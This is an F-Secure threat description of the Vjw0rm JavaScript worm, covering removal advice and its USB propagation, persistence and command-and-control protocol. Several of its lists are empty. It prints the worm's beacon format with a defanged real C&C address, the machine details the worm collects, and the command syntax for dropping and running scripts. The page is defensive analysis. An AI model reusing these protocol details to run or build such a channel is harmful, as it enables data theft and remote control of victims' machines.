Summary
Vjw0rm is a worm that infects accessible removal storage devices, such as a USB flash drive. It can also execute instructions it receives from a command and control (C&C) server, and stay persistent on the infected machine.
Removal
Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it.
A False Positive is when a file is incorrectly detected as harmful, usually because its code or behavior resembles known harmful programs. A False Positive will usually be fixed in a subsequent database update without any action needed on your part. If you wish, you may also:
- Check for the latest database updatesFirst, check if your F-Secure security program is using the latest updates, then try scanning the file again.
- Submit a sampleAfter checking, if you still believe the file is incorrectly detected, you can submit a sample of it for re-analysis.Note: If the file was moved to quarantine, you need to collect the file from quarantine before you can submit it.
- Exclude a file from further scanningIf you are certain that the file is safe and want to continue using it, you can exclude it from further scanning by the F-Secure security product.Note: You need administrative rights to change the settings.
Technical Details
The Vjw0rm worm is a malicious JavaScript file that spreads by creating copies of itself on accessible removable storage devices.
While active, the worm sends a network request to its C&C server every 7 seconds, providing information about the infected machine and awaiting additional instructions from its operator(s). If it receives instructions, the worm can execute them on the infected machine.
Arrival
This worm can arrive on a computer in several ways:
Propagation
Once it is present on a computer, the worm can propagate or spread copies of its malicious file by infecting removable storage devices that are inserted and accessible. It does so by performing the following set of actions every 7 seconds:
Persistence
In addition to propagating itself to maintain its presence, the worm can remain persistent on the infected machine in several ways:
Network activity
Vjw0rm contacts a remote C&C server to provide its operator(s) with information about the infected machine, as well as to retrieve any additional instructions they may issue.
Request
Every 7 seconds, the worm sends a POST request with a custom User-Agent to its C&C server. This allows the worm's operator(s) to identify which infected machines are online (and so are available to receive commands), as well as providing some basic information about the machines.
The request can be defined as:
POST [host]:[port]/Vre User-Agent: [tag]\[logicaldiskserialnum]\[computername]\[username] \[osnamever]\[avdisplayname]\\[vbc_exist]\[prev_infected]\
Where the variables are:
- def_host & def_port: Pre-defined C&C IP address & port
- tag: Can be defined both pre- and post-infection. It can be set post-infection through the rename functionality from the C&C server. This is useful for tagging and tracking infected computers
- logicaldiskserialnum: Logical disk's volume serial number
- computername & username: These are taken from environment variables
- osnamever: Gets the operating system version (e.g. Microsoft Windows 7 Enterprise)
- avdisplayname: Gets the display name of any running anti-virus (works both pre and post Vista by checking both 'winmgts:\\localhost\root\securitycenter' and '...\securitycenter2')
- vbc_exist: Checks for .NET VBC (Visual Basic Compiler) v2.0.50727
- prev_infected: Returns the value of the registry key, "HKCU\vjw0rm". This indicates if the user has been previously infected through the worm module, which means that the script has been executed from the root directory of an infected removable storage device
An example of the POST request:
POST 94[.]237[.]68[.]129[:]2828/Vre User-Agent: HookKernel_A8D34214\MYCOMPUTER\Joe\Microsoft Windows 7 Professional\undefined\\YES\FALSE\
Response
The worm's operator(s) can send a response to the infected machine's POST request that contains commands for the machine to execute. The response can be defined as:
[command][SPL][arg1][SPL][arg2]
Where the variables are:
- SPL: Delimiter (The default is |V| on both the original C&C executable and the script)
- command: Remotely issued instructions to be executed
- arg1 (optional): A payload, usually a script
- arg2 (optional): Usually a filename
An example of a response that gives instructions to drop and execute an additional script would be:
Sc|V|somescript|V|randomstring.ext
Where Sc is the command for executing an additional malicious module/script, somescript is the actual payload, randomstring is a randomly generated filename, and ext is the extension selected by the operator on the C&C server.
Executing remotely-issued commands
Vjw0rm is also able execute 5 distinct commands, any of which it can receive from the C&C as a response to a POST request. The commands are:
Protect your devices from malware with F‑Secure Total
Protecting your devices from malicious software is essential for maintaining online security. F‑Secure Total makes this easy, helping you to secure your devices in a brilliantly simple way.
- Award‑winning antivirus and malware protection
- Online browsing, banking, and shopping protection
- 24/7 online identity and data breach monitoring
- Unlimited VPN service to safeguard your privacy
- Password manager with private data protection
Choose how many devices you want to protect to get started.
- Free customer support
- Cancel anytime
- The trial does not obligate you to buy the product
After 30 days your subscription will renew automatically for one year at €69.99.
)
)
More Support
Community
Ask questions in our Community.
User guides
Check the user guide for instructions.
Contact Support
Chat with with or call an agent.
Submit a Sample
Submit a file or URL for analysis.